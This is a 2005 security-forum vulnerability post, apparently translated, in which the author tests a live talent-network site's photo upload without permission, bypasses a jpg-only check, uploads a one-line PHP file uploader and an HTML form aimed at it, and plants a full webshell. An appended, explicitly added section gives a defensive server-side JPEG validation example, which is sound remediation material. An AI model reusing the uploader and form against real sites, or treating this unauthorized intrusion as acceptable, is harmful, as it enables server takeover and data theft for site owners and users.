A common problem in talent network sites - vulnerability warning - the black bar safety net

ID MYHACK58:6220055701
Type myhack58
Reporter Anonymous
Modified 2005-12-23T00:00:00


Today I had some free time and was browsing a talent network. Out of habit... I tested it in passing. The program is PHP, and PHP injection is not much of a strong point anyway, so I just picked a few points and tried them. There did not seem to be anything much there, so I moved on to another page.

Back on the home page. Ah, the talent network lets you upload photos? Might as well try it, since I am idle anyway. Register an account and see. And, what do you know, it really was as I guessed.

I will skip the registration process. After registering, log in... upload a photo. "You can only upload files in jpg format"... You say only jpg can be uploaded and I should believe it? I am not stupid, so I uploaded a php file. Huh.. it says the file is too big.. haha.. that was probably the shell I uploaded. Switching to a small uploader will do. Well.. that's OK...

First, upload a small uploader. Code: <?php copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?>

Success. The image shows as an X; view its properties. The address is http://userfile.***.cn/seeker/416196/901/r3j3ct123/test.php

Good. Next, change the ACTION in the htm below..

<form ENCTYPE="multipart/form-data" ACTION="http://userfile.xxx.cn/seeker/416196/901/r3j3ct123/test.php/" METHOD="POST"> <input NAME="MyFile" TYPE="file"> <input VALUE="submit" TYPE="submit"> </form>

Find a full-size webshell. Submit it. Success.. the lovely shell is presented perfectly in front of me......

In fact, this upload problem has no real technical content. No, I should say none at all.. I only hope this article can remind the authors of those talent network programs to pay attention to small details. The places you often ignore are the places where someone will start..
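
The missing server-side check, as an added example that is not from the original article or the site's code: the photo handler announced "jpg only" but still accepted a .php file and served it from the upload directory. The field name MyFile is taken from the form above; UPLOAD_DIR, MAX_BYTES and store_photo() are assumptions, and the fileinfo and GD extensions are assumed to be enabled.

```php
<?php
declare(strict_types=1);
// Added example, not the site's code. The field name "MyFile" comes from the
// form on this page; UPLOAD_DIR and MAX_BYTES are assumed values.
const UPLOAD_DIR = '/var/app-data/photos'; // assumed: outside the web root
const MAX_BYTES  = 2 * 1024 * 1024;        // assumed size limit

function store_photo(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    $tmp = (string) ($file['tmp_name'] ?? '');
    // Accept only a file PHP itself received in this request.
    if (!is_uploaded_file($tmp) || filesize($tmp) > MAX_BYTES) {
        throw new RuntimeException('missing or oversized upload');
    }
    // Decide the type from the bytes. $file['name'] and $file['type'] are
    // client-controlled and are never consulted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    if ($mime !== 'image/jpeg') {
        throw new RuntimeException('not a JPEG');
    }
    // Decode and re-encode so the stored file is a fresh JPEG written by the server.
    $img = @imagecreatefromjpeg($tmp);
    if ($img === false) {
        throw new RuntimeException('corrupt JPEG');
    }
    // Server-chosen random name with a fixed extension.
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.jpg';
    if (!imagejpeg($img, $dest, 85)) {
        throw new RuntimeException('could not store image');
    }
    return $dest;
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST' && isset($_FILES['MyFile'])) {
    try {
        store_photo($_FILES['MyFile']);
        echo 'stored';
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'rejected';
    }
}
```

If photos must be served straight from a directory under the web root, that directory should also be configured so the web server never hands its files to the PHP interpreter.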